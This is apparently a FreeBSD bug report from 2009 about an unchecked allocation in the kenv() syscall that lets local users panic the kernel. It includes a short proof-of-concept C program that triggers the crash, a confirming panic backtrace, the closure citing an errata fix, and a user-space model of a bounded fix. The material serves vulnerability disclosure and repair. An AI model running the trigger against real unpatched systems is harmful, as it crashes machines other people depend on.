From nobody@FreeBSD.org  Sun Jan 11 21:23:37 2009
Return-Path: <nobody@FreeBSD.org>
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id 379561065676
	for <freebsd-gnats-submit@FreeBSD.org>; Sun, 11 Jan 2009 21:23:37 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21])
	by mx1.freebsd.org (Postfix) with ESMTP id 0BA058FC08
	for <freebsd-gnats-submit@FreeBSD.org>; Sun, 11 Jan 2009 21:23:37 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from www.freebsd.org (localhost [127.0.0.1])
	by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n0BLNaw8018755
	for <freebsd-gnats-submit@FreeBSD.org>; Sun, 11 Jan 2009 21:23:36 GMT
	(envelope-from nobody@www.freebsd.org)
Received: (from nobody@localhost)
	by www.freebsd.org (8.14.3/8.14.3/Submit) id n0BLNano018753;
	Sun, 11 Jan 2009 21:23:36 GMT
	(envelope-from nobody)
Message-Id: <200901112123.n0BLNano018753@www.freebsd.org>
Date: Sun, 11 Jan 2009 21:23:36 GMT
From: Nikolaos Rangos <nikolaos.rangos@googlemail.com>
To: freebsd-gnats-submit@FreeBSD.org
Subject: Normal users can crash 7.0-RELEASE through "kenv" syscall
X-Send-Pr-Version: www-3.1
X-GNATS-Notify:

>Number:         130391
>Category:       kern
>Synopsis:       [kenv] Normal users can crash 7.0-RELEASE through "kenv" syscall
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Sun Jan 11 21:30:02 UTC 2009
>Closed-Date:    Mon Mar 30 11:08:02 UTC 2009
>Last-Modified:  Mon Mar 30 11:08:02 UTC 2009
>Originator:     Nikolaos Rangos
>Release:        FreeBSD 7.0 RELEASE
>Organization:
>Environment:
FreeBSD localhost.Belkin 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008     root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

80 megs of RAM :) in a VM
>Description:
While digging for kernel bugs in FreeBSD 7.0-RELEASE I found the following:

There is an unchecked call to malloc() in the kenv() syscall.
Any value greater than zero may be passed from user space to malloc().

Code snippet taken from sys/kern/kern_environment.c (FreeBSD 7.0):

 80 kenv(td, uap)
 81         struct thread *td;
 82         struct kenv_args /* {
 83                 int what;
 84                 const char *name;
 85                 char *value;
 86                 int len;
 87         } */ *uap;
 88 {
 89         char *name, *value, *buffer = NULL;
 90         size_t len, done, needed;
 91         int error, i;
 92 
 93         KASSERT(dynamic_kenv, ("kenv: dynamic_kenv = 0"));
 94 
 95         error = 0;
 96         if (uap->what == KENV_DUMP) {
 97 #ifdef MAC
 98                 error = mac_check_kenv_dump(td->td_ucred);
 99                 if (error)
100                         return (error);
101 #endif
102                 done = needed = 0;
103                 if (uap->len > 0 && uap->value != NULL) 
104 [1]                     buffer = malloc(uap->len, M_TEMP, M_WAITOK|M_ZERO);
105                 mtx_lock(&kenv_lock);

At line 104 uap->len is passed to malloc() without a size check, which lets normal local users crash the kernel with a huge memory allocation. The len argument is in this case an int, so the greatest value a normal user can pass is 0x7fffffff.

FreeBSD 6.4 and MAYBE previous versions of FreeBSD do NOT contain this bug as there is no such call to malloc().

>How-To-Repeat:
Use this small testing program:

#include <stdio.h>
#include <kenv.h>

int main(void) {
        char env[100];
        /* the dump length reaches the kernel's malloc() unchecked */
        kenv(KENV_DUMP, NULL, env, 0x7fffffff);
        return 0;
}

>Fix:


>Release-Note:
>Audit-Trail:

From: Gavin Atkinson <gavini@FreeBSD.org>
To: bug-followup@FreeBSD.org
Cc: scottl@FreeBSD.org
Subject: Re: kern/130391: Normal users can crash 7.0-RELEASE through "kenv" syscall
Date: Sun, 11 Jan 2009 23:15:03 +0000 (GMT)

 I can confirm that this bug still exists on HEAD (sparc64):
 FreeBSD 8.0-20081215-SNAP (GENERIC) #0: Mon Dec 15 15:58:11 UTC 2008
 
 > cc 130391.c
 > ./a.out
 
 panic: kmem_malloc(-2147483648): kmem_map too small: 3497984 total allocated
 cpuid = 0
 KDB: enter: panic
 [thread pid 1124 tid 100065 ]
 Stopped at      kdb_enter+0x80: ta              %xcc, 1
 db> bt
 Tracing pid 1124 tid 100065 td 0xfffff80001b0b880
 panic() at panic+0x20c
 kmem_malloc() at kmem_malloc+0x2d8
 page_alloc() at page_alloc+0x28
 uma_large_malloc() at uma_large_malloc+0x44
 malloc() at malloc+0x1b0
 kenv() at kenv+0x88
 syscall() at syscall+0x2f0
 -- syscall (390, FreeBSD ELF64, kenv) %o7=0x10067c --
 userland() at 0x40454768
 user trace: trap %o7=0x10067c
 pc 0x40454768, sp 0x7fdffffe211
 pc 0x100550, sp 0x7fdffffe341
 pc 0x402066f4, sp 0x7fdffffe401
 done
 db>
 
 The changes that introduced this seem to be sys/kern/kern_environment.c 
 1.44 (by scottl@, cc'd)
 
 Gavin
State-Changed-From-To: open->closed 
State-Changed-By: gavin 
State-Changed-When: Mon Mar 30 11:03:39 UTC 2009 
State-Changed-Why:  
Thanks for reporting this, it has been fixed with the issue of FreeBSD 
Errata Notice FreeBSD-EN-09:01.kenv and has been fixed in 7.0 and 7.1 
as well as the 7-STABLE branch. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=130391 
>Unformatted:

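The unchecked-length pattern from the Description, modelled in user space as an added example (this is not the kernel's code and not the errata's patch): the vulnerable allocation beside a clamped one, plus a model of the KENV_DUMP loop that reports the size the caller actually needs. The KENV_* limits and the sample environment are assumed values.

```c
#include <stdlib.h>
#include <string.h>

/* Limits modelled on the kenv(2) constants; the values are assumed here. */
#define KENV_SIZE      512
#define KENV_MNAMELEN  128
#define KENV_MVALLEN   128
/* Largest dump possible: every slot holding a maximal "name=value\0". */
#define KENV_DUMP_MAX  ((size_t)KENV_SIZE * (KENV_MNAMELEN + KENV_MVALLEN + 2))

/* Constructed sample environment standing in for the kernel's kenvp[]. */
static const char *sample_kenv[] = { "hint.acpi.0.disabled=1", "kern.vty=vt", NULL };

/* Allocation the vulnerable path requests: the caller's len, unbounded.
 * 0x7fffffff from an unprivileged process becomes a 2 GiB M_WAITOK request,
 * which is what produced the kmem_malloc panic shown in the audit trail. */
size_t vulnerable_alloc_size(int len) {
    return len > 0 ? (size_t)len : 0;
}

/* Hardened path: a dump can never exceed KENV_DUMP_MAX bytes, so clamp the
 * requested length to that bound before allocating anything. */
size_t hardened_alloc_size(int len) {
    size_t buflen = len > 0 ? (size_t)len : 0;   /* <= 0: nothing allocated */
    return buflen > KENV_DUMP_MAX ? KENV_DUMP_MAX : buflen;
}

/* Model of the dump loop: copies "name=value\0" entries into buf (at most
 * buflen bytes) and returns the size the whole dump needs, so a caller whose
 * buffer was too small can retry with a larger one. */
size_t kenv_dump_model(const char **env, char *buf, size_t buflen) {
    size_t done = 0, needed = 0;
    for (size_t i = 0; env[i] != NULL; i++) {
        size_t elen = strlen(env[i]) + 1;
        needed += elen;
        if (done + elen <= buflen) {
            memcpy(buf + done, env[i], elen);
            done += elen;
        }
    }
    return needed;
}

/* Runs the hardened path for a caller-supplied len and returns the needed size. */
size_t hardened_dump_needed(int len) {
    size_t buflen = hardened_alloc_size(len);
    char *buf = calloc(buflen + 1, 1);   /* +1 so len == 0 still gets a buffer */
    size_t needed = kenv_dump_model(sample_kenv, buf, buflen);
    free(buf);
    return needed;
}
```

With the clamp in place a 0x7fffffff request allocates at most KENV_DUMP_MAX bytes (132096 with the assumed limits) and the caller still gets the true dump size back.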